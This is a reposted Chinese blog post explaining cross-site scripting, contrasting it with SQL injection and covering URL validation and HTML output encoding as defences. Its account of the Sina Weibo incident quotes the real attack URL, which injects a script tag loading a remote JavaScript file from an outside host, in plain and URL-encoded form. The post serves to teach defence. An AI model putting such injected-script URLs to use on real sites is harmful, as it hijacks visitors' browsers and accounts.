网络攻击之二:XSS(之一是SQL注入,前面有文章)

学习了 http://www.oschina.net/question/565065_57506

(这里做了转载 http://blog.csdn.net/stilling2006/article/details/8526498)

Cross-site scripting(XSS),是一种经常出现在Web应用中的计算机安全漏洞,它允许恶意Web用户将代码植入到提供给其它用户使用的页面中。比如,包括HTML代码和客户端脚本的页面。为不和层叠样式表(CSS)的缩写混淆,通常将跨站脚本缩写为XSS。

SQL Injection是把恶意的代码注入的数据库并且执行该SQL语句,最后返回相应数据,所以SQL Injection是作用于数据库的

而XSS是通过发送恶意的代码到服务,让服务器把恶意代码发送到其他用户浏览器中,最后劫持用户浏览器,所以XSS是作用于用户的

XSS主要攻击方式有两种:

一种就像SQL Injection攻击一样,我把一段脚本注入到服务器上,用户访问方法服务器的某个URL,这个URL就会把远端的js注入进来,这个js有可能自动进行很多操作。
比如这次事件中的帮你发微博,帮你发站内消息等。注入有很多方法,比如:提交表单,更改URL参数,上传图片,设置签名,等等。 另一类则是来自外部的攻击,主要指的自己构造XSS 跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,
我们自己构造一个跨站网页放在自己的服务器上,
然后通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。
这一类攻击的威胁相对较低,至少Ajax 要发起跨站调用是非常困难的(你可能需要hack浏览器)。

 

通过上面的示意例子我们发现XSS攻击和SQL Injection存在着相同点,它们是通过注恶意代码进行攻击的,不同点是它们攻击对象不尽相同。

XSS是通过注入恶意代码,如:JavaScript, VBScript, ActiveX, HTML, 或 Flash等来劫持用户浏览器,进而通过构造恶意的URL。

构造恶意Url的意思是:

很多网站页面元素拼接是由url参数来组成的。

如果恶意篡改参数,会将一些script也混在页面中发给用户。用户打开时,这些js脚本就运行了。

可以改了url之后,把这些url发给用户,让用户点击。用户看到host是大网站就没有提高警惕,却误让这些js脚本得到执行了。

下面这段JS可以实现URL的校验:

var url = Request.QueryString["url"];
if (!string.IsNullOrEmpty(url))
{
    this.litLeavingTag.Text =
    Regex.IsMatch(url, @"\w+:\/{2}[\d\w-]+(\.[\d\w-]+)*(?:(?:\/[^\s/]*))*") ?
    string.Format("<a href={0} >examplejob</a>", url) : "The url is invalid.";
}

上面这个正则,我也有有一点,没看到,尤其是为什么需要两个"(?:"。关于正则语法和学习,参考我另外一个转载的文章:

http://www.cnblogs.com/charlesblc/p/5990322.html

HTML编码输出:

另一种必不可少的XSS防御策略是输出编码方式,它通过确保在一个字符串中的每个字符都以正确的形式呈现。例如,为了在浏览器中正确地呈现“<”,“>”或空格等文本时,
我们需要对其进行编码处理,否则浏览器将根据这些特性文本去执行其功能,而不是正确的呈现在页面上。 我们常见的HTML编码有:
&nbsp;,&lt;,&gt;和&quot; 等等。

非HTML编码输出:

当我们把HTML编码后的文本通过消息提示框显示时,文本还是以编码后的形式显示没有进行解码处理,但用户一看到他们的第一反应就是说我们的程序出现乱码有问题,
其实我们心知只是还没有进行解码处理而已,所以在一些非HTML编码中我们还要先进行解码处理

新浪微博XSS攻击事件

 想必大家对新浪微博XSS攻击事件记忆犹新吧!它利用了微博广场页面 http://weibo.com/pub/star 的一个URL注入了js脚本,
然后通过http://163.fm/PxZHoxn短链接服务,将链接指向: ">">">http://weibo.com/pub/star/<script src=//www.2kt.cn/images/t.js></script> link:http://weibo.com/pub/star/%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E URL编码后显示: http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update 通过上面的例子大家发现其实上面的XSS攻击也并不是那么神秘。

总结

XSS攻击作为Web业务的最大威胁之一,它犯下了种种罪行例如新浪微博的XSS攻击事件,不仅危害Web业务本身,对访问Web业务的用户也会带来直接的影响,
如何防御和阻止XSS攻击,保障Web站点的业务安全,这个重担有落到每一位开发者的身上了。

 

posted @ 2016-10-23 15:39  blcblc  阅读(522)  评论(0编辑  收藏  举报